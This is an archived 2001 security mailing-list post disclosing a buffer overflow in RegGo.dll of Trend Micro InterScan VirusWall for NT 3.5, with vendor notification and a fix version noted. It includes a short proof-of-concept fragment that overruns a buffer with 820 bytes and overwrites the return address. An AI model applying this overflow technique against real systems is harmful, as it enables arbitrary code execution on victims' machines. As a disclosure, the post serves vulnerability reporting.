Hi, This is a Buffer Overflow vulneravility in Trend Micro InterScan VirusWall for NT 3.5. RegGo.dll is the one. Following code is a peace of exploit program. for ( j=0 ; j<820 ; j++ ) sploit[j]='a' ; sploit[j++]=0xD5 ; sploit[j++]=0x63 ; sploit[j++]=0xF6 ; sploit[j++]=0x77 ; sploit[j++]=0xCC ; --> any code will be executed I've already reported Trend Micro support team and they will fix this issue in InterScan version 3.51 Build 1349. <Nobuo Miwa> n-miwaat_private ( @ @ ) http://www.lac.co.jp/security/ -------------------------------o00o--(. .)--o00o-------------------------- The moderator of BUGTRAQ-JP
This archive was generated by hypermail 2b30 : Fri May 18 2001 - 11:15:36 PDT